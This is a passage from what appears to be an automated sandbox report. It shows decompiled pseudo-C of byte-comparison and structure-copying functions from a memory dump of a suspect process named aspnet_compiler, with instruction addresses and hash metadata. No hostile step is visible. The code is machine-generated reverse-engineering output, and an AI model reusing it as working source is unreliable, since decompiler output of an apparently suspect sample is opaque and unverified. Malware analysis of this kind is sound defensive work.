										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























                0x004361ce
                0x004361ce
                0x004361d4
                0x0043624b
                0x0043624d
                0x0043624f
                0x00000000
                0x00000000
                0x00436255
                0x0043625b
                0x004362e2
                0x004362e4
                0x004362e6
                0x00000000
                0x00000000
                0x004362ec
                0x004362f2
                0x00436379
                0x0043637b
                0x0043637d
                0x00000000
                0x00000000
                0x00436383
                0x00436389
                0x00436410
                0x00436412
                0x00436414
                0x00000000
                0x00000000
                0x0043641a
                0x00436420
                0x004364a7
                0x004364a9
                0x004364ab
                0x00000000
                0x00000000
                0x004364b7
                0x0043653f
                0x00436541
                0x00436543
                0x00000000
                0x00000000
                0x00436549
                0x0043654f
                0x004365d6
                0x004365d8
                0x004365da
                0x004365e8
                0x004365ea
                0x004365f7
                0x004365f7
                0x004365ea
                0x00000000
                0x004365da
                0x0043655c
                0x0043655e
                0x00436576
                0x0043657e
                0x00436580
                0x00436598
                0x004365a0
                0x004365a2
                0x004365ba
                0x004365c2
                0x004365c4
                0x004365cd
                0x004365cd
                0x00000000
                0x004365c4
                0x004365ab
                0x004365b4
                0x00000000
                0x00000000
                0x00000000
                0x004365b4
                0x00436589
                0x00436592
                0x00000000
                0x00000000
                0x00000000
                0x00436592
                0x00436567
                0x00436570
                0x00000000
                0x00000000
                0x00000000
                0x00436570
                0x004364c5
                0x004364c7
                0x004364df
                0x004364e7
                0x004364e9
                0x00436501
                0x00436509
                0x0043650b
                0x00436523
                0x0043652b
                0x0043652d
                0x00436536
                0x00436536
                0x00000000
                0x0043652d
                0x00436514
                0x0043651d
                0x00000000
                0x00000000
                0x00000000
                0x0043651d
                0x004364f2
                0x004364fb
                0x00000000
                0x00000000
                0x00000000
                0x004364fb
                0x004364d0
                0x004364d9
                0x00000000
                0x00000000
                0x00000000
                0x004364d9
                0x0043642d
                0x0043642f
                0x00436447
                0x0043644f
                0x00436451
                0x00436469
                0x00436471
                0x00436473
                0x0043648b
                0x00436493
                0x00436495
                0x0043649e
                0x0043649e
                0x00000000
                0x00436495
                0x0043647c
                0x00436485
                0x00000000
                0x00000000
                0x00000000
                0x00436485
                0x0043645a
                0x00436463
                0x00000000
                0x00000000
                0x00000000
                0x00436463
                0x00436438
                0x00436441
                0x00000000
                0x00000000
                0x00000000
                0x00436441
                0x00436396
                0x00436398
                0x004363b0
                0x004363b8
                0x004363ba
                0x004363d2
                0x004363da
                0x004363dc
                0x004363f4
                0x004363fc
                0x004363fe
                0x00436407
                0x00436407
                0x00000000
                0x004363fe
                0x004363e5
                0x004363ee
                0x00000000
                0x00000000
                0x00000000
                0x004363ee
                0x004363c3
                0x004363cc
                0x00000000
                0x00000000
                0x00000000
                0x004363cc
                0x004363a1
                0x004363aa
                0x00000000
                0x00000000
                0x00000000
                0x004363aa
                0x004362ff
                0x00436301
                0x00436319
                0x00436321
                0x00436323
                0x0043633b
                0x00436343
                0x00436345
                0x0043635d
                0x00436365
                0x00436367
                0x00436370
                0x00436370
                0x00000000
                0x00436367
                0x0043634e
                0x00436357
                0x00000000
                0x00000000
                0x00000000
                0x00436357
                0x0043632c
                0x00436335
                0x00000000
                0x00000000
                0x00000000
                0x00436335
                0x0043630a
                0x00436313
                0x00000000
                0x00000000
                0x00000000
                0x00436313
                0x00436268
                0x0043626a
                0x00436282
                0x0043628a
                0x0043628c
                0x004362a4
                0x004362ac
                0x004362ae
                0x004362c6
                0x004362ce
                0x004362d0
                0x004362d9
                0x004362d9
                0x00000000
                0x004362d0
                0x004362b7
                0x004362c0
                0x00000000
                0x00000000
                0x00000000
                0x004362c0
                0x00436295
                0x0043629e
                0x00000000
                0x00000000
                0x00000000
                0x0043629e
                0x00436273
                0x0043627c
                0x00000000
                0x00000000
                0x00000000
                0x004361d6
                0x004361d6
                0x004361dd
                0x004361df
                0x004361f3
                0x004361f3
                0x004361fb
                0x004361fd
                0x00436211
                0x00436211
                0x00436219
                0x0043621b
                0x0043622f
                0x0043622f
                0x00436237
                0x00436239
                0x00436242
                0x00436242
                0x00000000
                0x00436239
                0x00436221
                0x00436224
                0x0043622d
                0x00000000
                0x00000000
                0x00000000
                0x0043622d
                0x00436203
                0x00436206
                0x0043620f
                0x00000000
                0x00000000
                0x00000000
                0x0043620f
                0x004361e5
                0x004361e8
                0x004361f1
                0x00000000
                0x00000000
                0x00000000
                0x004361f1
                0x004361c6
                0x004361c6
                0x00436fb7

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                • Instruction ID: c4f57d891009220d5e87c960dee6aaef52858562a4a94721daf6ec7dd3fe307b
                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                • Instruction Fuzzy Hash: 15C195322051931ADF2D4639893403FBAB15AA57B171BA76FD8B3CB2C5FE18C538D624
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00435DB6 Relevance: .3, Instructions: 323COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E00435DB6(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}


































                0x00435db6
                0x00435db6
                0x00435db6
                0x00435dbc
                0x00435e43
                0x00435e45
                0x00435e47
                0x004361c6
                0x004361c6
                0x00436fb7
                0x00436fb7
                0x00435e4d
                0x00435e53
                0x00435eda
                0x00435edc
                0x00435ede
                0x00000000
                0x00000000
                0x00435ee4
                0x00435eea
                0x00435f71
                0x00435f73
                0x00435f75
                0x00000000
                0x00000000
                0x00435f7b
                0x00435f81
                0x00436008
                0x0043600a
                0x0043600c
                0x00000000
                0x00000000
                0x00436018
                0x004360a0
                0x004360a2
                0x004360a4
                0x00000000
                0x00000000
                0x004360aa
                0x004360b0
                0x00436137
                0x00436139
                0x0043613b
                0x00000000
                0x00000000
                0x00436141
                0x00436147
                0x004361be
                0x004361c0
                0x004361c2
                0x004361c4
                0x004361c4
                0x00000000
                0x004361c2
                0x00436150
                0x00436152
                0x00436166
                0x0043616e
                0x00436170
                0x00436184
                0x0043618c
                0x0043618e
                0x004361a2
                0x004361aa
                0x004361ac
                0x004361b5
                0x004361b5
                0x00000000
                0x004361ac
                0x00436197
                0x004361a0
                0x00000000
                0x00000000
                0x00000000
                0x004361a0
                0x00436179
                0x00436182
                0x00000000
                0x00000000
                0x00000000
                0x00436182
                0x0043615b
                0x00436164
                0x00000000
                0x00000000
                0x00000000
                0x00436164
                0x004360bd
                0x004360bf
                0x004360d7
                0x004360df
                0x004360e1
                0x004360f9
                0x00436101
                0x00436103
                0x0043611b
                0x00436123
                0x00436125
                0x0043612e
                0x0043612e
                0x00000000
                0x00436125
                0x0043610c
                0x00436115
                0x00000000
                0x00000000
                0x00000000
                0x00436115
                0x004360ea
                0x004360f3
                0x00000000
                0x00000000
                0x00000000
                0x004360f3
                0x004360c8
                0x004360d1
                0x00000000
                0x00000000
                0x00000000
                0x004360d1
                0x00436026
                0x00436028
                0x00436040
                0x00436048
                0x0043604a
                0x00436062
                0x0043606a
                0x0043606c
                0x00436084
                0x0043608c
                0x0043608e
                0x00436097
                0x00436097
                0x00000000
                0x0043608e
                0x00436075
                0x0043607e
                0x00000000
                0x00000000
                0x00000000
                0x0043607e
                0x00436053
                0x0043605c
                0x00000000
                0x00000000
                0x00000000
                0x0043605c
                0x00436031
                0x0043603a
                0x00000000
                0x00000000
                0x00000000
                0x0043603a
                0x00435f8e
                0x00435f90
                0x00435fa8
                0x00435fb0
                0x00435fb2
                0x00435fca
                0x00435fd2
                0x00435fd4
                0x00435fec
                0x00435ff4
                0x00435ff6
                0x00435fff
                0x00435fff
                0x00000000
                0x00435ff6
                0x00435fdd
                0x00435fe6
                0x00000000
                0x00000000
                0x00000000
                0x00435fe6
                0x00435fbb
                0x00435fc4
                0x00000000
                0x00000000
                0x00000000
                0x00435fc4
                0x00435f99
                0x00435fa2
                0x00000000
                0x00000000
                0x00000000
                0x00435fa2
                0x00435ef7
                0x00435ef9
                0x00435f11
                0x00435f19
                0x00435f1b
                0x00435f33
                0x00435f3b
                0x00435f3d
                0x00435f55
                0x00435f5d
                0x00435f5f
                0x00435f68
                0x00435f68
                0x00000000
                0x00435f5f
                0x00435f46
                0x00435f4f
                0x00000000
                0x00000000
                0x00000000
                0x00435f4f
                0x00435f24
                0x00435f2d
                0x00000000
                0x00000000
                0x00000000
                0x00435f2d
                0x00435f02
                0x00435f0b
                0x00000000
                0x00000000
                0x00000000
                0x00435f0b
                0x00435e60
                0x00435e62
                0x00435e7a
                0x00435e82
                0x00435e84
                0x00435e9c
                0x00435ea4
                0x00435ea6
                0x00435ebe
                0x00435ec6
                0x00435ec8
                0x00435ed1
                0x00435ed1
                0x00000000
                0x00435ec8
                0x00435eaf
                0x00435eb8
                0x00000000
                0x00000000
                0x00000000
                0x00435eb8
                0x00435e8d
                0x00435e96
                0x00000000
                0x00000000
                0x00000000
                0x00435e96
                0x00435e6b
                0x00435e74
                0x00000000
                0x00000000
                0x00000000
                0x00435e74
                0x00435dc9
                0x00435dcb
                0x00435de3
                0x00435deb
                0x00435ded
                0x00435e05
                0x00435e0d
                0x00435e0f
                0x00435e27
                0x00435e2f
                0x00435e31
                0x00435e3a
                0x00435e3a
                0x00000000
                0x00435e31
                0x00435e18
                0x00435e21
                0x00000000
                0x00000000
                0x00000000
                0x00435e21
                0x00435df6
                0x00435dff
                0x00000000
                0x00000000
                0x00000000
                0x00435dff
                0x00435dd4
                0x00435ddd
                0x00000000
                0x00000000
                0x00000000

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                • Instruction ID: a055fa05aba04ec1a546175f8f3573ad3e8fdc911b471be58b210e9afcaf92f7
                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                • Instruction Fuzzy Hash: 4FC183322051930ADF2D8639C93503FBAB15AA57B171B676FD4B3CB2C5FE28C5389614
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041C46D Relevance: .3, Instructions: 277COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 98%
                			E0041C46D(intOrPtr* __ecx, intOrPtr* __edx, void* __esi) {
				void* __edi;
				void* _t100;
				void* _t102;
				intOrPtr* _t220;
				signed int _t226;
				signed int _t231;
				signed int _t234;
				signed int _t239;
				signed int _t242;
				signed int _t245;
				signed int _t249;
				signed int _t252;
				signed int _t262;
				signed int _t272;
				signed int _t275;
				signed int _t278;
				signed int _t281;
				signed int _t284;
				signed int _t287;
				void* _t290;
				intOrPtr _t292;
				void* _t296;
				signed int _t299;
				void* _t303;
				intOrPtr* _t304;
				void* _t305;

				_t296 = __esi;
				_t264 = __edx;
				_t220 = __ecx;
				_t304 = __edx;
				if(__ecx == 0 || __edx == 0) {
					L14:
					return 0xffffff53;
				} else {
					_t292 =  *((intOrPtr*)(_t305 + 0x10));
					if( *((intOrPtr*)(__ecx + 4)) != 0 || _t292 != 0) {
						_t222 =  *_t220;
						if( *_t220 != 0) {
							E0041F562(_t100, _t222, _t264, _t296);
						}
						_t102 = E0041C42F(_t304, 1);
						if(_t102 < 0) {
							return _t102;
						} else {
							 *_t220 = _t304;
							_push(_t296);
							 *((short*)(_t220 + 0x220)) =  *((intOrPtr*)( *_t304));
							 *((short*)(_t220 + 0x388)) =  *((intOrPtr*)(_t304 + 0x80));
							 *((intOrPtr*)(_t220 + 0x374)) =  *((intOrPtr*)(_t304 + 0x7c));
							 *((intOrPtr*)(_t220 + 0x38c)) =  *((intOrPtr*)(_t304 + 0x84));
							 *((intOrPtr*)(_t220 + 0x20c)) =  *((intOrPtr*)(_t304 + 0x78));
							 *((intOrPtr*)(_t220 + 0x80)) =  *((intOrPtr*)(_t304 + 0x74));
							_t226 = ( *( *_t304 + 2) & 3) << 0x00000004 |  *(_t220 + 0x310) & 0x0000ffcf;
							 *(_t220 + 0x310) = _t226;
							_t299 = ( *( *_t304 + 3) & 1) << 0x0000000a | _t226 & 0x0000fbff;
							 *(_t220 + 0x310) = _t299;
							 *((char*)(_t220 + 0x31d)) =  *((intOrPtr*)(_t304 + 0x60));
							_t272 = ( *(_t304 + 0x5e) >> 0x00000002 & 1) << 0x00000008 |  *(_t220 + 0x312) & 0x0000feff;
							 *(_t220 + 0x312) = _t272;
							_t231 = ( *(_t304 + 0x5e) >> 0x00000003 & 1) << 0x00000009 | _t272 & 0x0000fdff;
							 *(_t220 + 0x312) = _t231;
							_t275 = ( *(_t304 + 0x5e) >> 0x00000004 & 1) << 0x0000000b | _t231 & 0x0000f7ff;
							 *(_t220 + 0x312) = _t275;
							_t234 = ( *(_t304 + 0x5e) >> 0x00000001 & 1) << 0x00000007 | _t275 & 0x0000ff7f;
							 *(_t220 + 0x312) = _t234;
							 *(_t220 + 0x312) = ( *(_t304 + 0x5e) >> 0x00000005 & 1) << 0x0000000c | _t234 & 0x0000efff;
							 *((short*)(_t220 + 0x324)) =  *((intOrPtr*)(_t304 + 0x62));
							 *((short*)(_t220 + 0x326)) =  *((intOrPtr*)(_t304 + 0x64));
							 *((short*)(_t220 + 0x32a)) =  *((intOrPtr*)(_t304 + 0x66));
							_t278 = ( *(_t304 + 0x5d) >> 0x00000004 & 1) << 0x00000002 | _t299 & 0x0000fffb;
							 *(_t220 + 0x310) = _t278;
							_t239 = ( *(_t304 + 0x5d) >> 0x00000005 & 1) << 0x00000003 | _t278 & 0x0000fff7;
							 *(_t220 + 0x310) = _t239;
							_t281 = ( *(_t304 + 0x5d) & 1) << 0x00000006 | _t239 & 0x0000ffbf;
							 *(_t220 + 0x310) = _t281;
							_t242 = ( *(_t304 + 0x5d) >> 0x00000001 & 1) << 0x00000007 | _t281 & 0x0000ff7f;
							 *(_t220 + 0x310) = _t242;
							_t284 = ( *(_t304 + 0x5d) >> 0x00000002 & 1) << 0x00000008 | _t242 & 0x0000feff;
							 *(_t220 + 0x310) = _t284;
							_t245 = ( *(_t304 + 0x5d) >> 0x00000003 & 1) << 0x00000009 | _t284 & 0x0000fdff;
							 *(_t220 + 0x310) = _t245;
							 *(_t220 + 0x310) =  *(_t304 + 0x5d) >> 0x00000006 & 0x000000ff | _t245 & 0x0000fffc;
							_t249 = ( *(_t304 + 0x5e) >> 0x00000006 & 1) << 0x00000003 |  *(_t220 + 0x314) & 0x0000fff7;
							 *(_t220 + 0x314) = _t249;
							_t287 = ( *(_t304 + 0x5e) >> 0x00000007 & 0x000000ff) << 0x00000004 | _t249 & 0x0000ffef;
							 *(_t220 + 0x314) = _t287;
							_t252 = ( *(_t304 + 0x5f) & 1) << 0x00000006 | _t287 & 0x0000ffbf;
							 *(_t220 + 0x314) = _t252;
							_t290 = 1;
							 *(_t220 + 0x314) = ( *(_t304 + 0x61) >> 0x00000005 & 1) << 0x0000000f | _t252 & 0x00007fff;
							 *((intOrPtr*)(_t220 + 0x12c)) =  *((intOrPtr*)(_t304 + 0x24));
							 *((intOrPtr*)(_t220 + 0x130)) =  *((intOrPtr*)(_t304 + 0x28));
							 *((intOrPtr*)(_t220 + 0x134)) =  *((intOrPtr*)(_t304 + 0x2c));
							 *((intOrPtr*)(_t220 + 0x138)) =  *((intOrPtr*)(_t304 + 0x30));
							 *((intOrPtr*)(_t220 + 0x150)) =  *((intOrPtr*)(_t304 + 0x34));
							 *((intOrPtr*)(_t220 + 0x164)) =  *((intOrPtr*)(_t304 + 0x38));
							 *((intOrPtr*)(_t220 + 0x168)) =  *((intOrPtr*)(_t304 + 0x3c));
							 *((intOrPtr*)(_t220 + 0x154)) =  *((intOrPtr*)(_t304 + 0x40));
							 *(_t220 + 0x158) =  *(_t220 + 0x158) ^ ( *(_t220 + 0x158) ^  *(_t304 + 0x44)) & 0x0000007f;
							 *(_t220 + 0x158) = ( *(_t304 + 0x44) ^  *(_t220 + 0x158)) & 0x0000007f ^  *(_t304 + 0x44);
							 *((intOrPtr*)(_t220 + 0x15c)) =  *((intOrPtr*)(_t304 + 0x48));
							 *((intOrPtr*)(_t220 + 0x160)) =  *((intOrPtr*)(_t304 + 0x4c));
							if(_t292 == 0) {
								_t303 =  *(_t304 + 0x54);
								if(_t303 == 0) {
									E00435760(_t292,  *(_t220 + 4), 0, 0x158);
									_t290 = 1;
								} else {
									_t262 = 0x56;
									memcpy( *(_t220 + 4), _t303, _t262 << 2);
								}
								if(( *(_t220 + 0x310) & 0x00000030) != 0x30) {
									_t290 = E0041C3BF(_t220);
								}
							}
							 *((intOrPtr*)(_t220 + 0x90)) =  *((intOrPtr*)(_t304 + 0x6c));
							 *((intOrPtr*)(_t220 + 0x94)) =  *((intOrPtr*)(_t304 + 0x70));
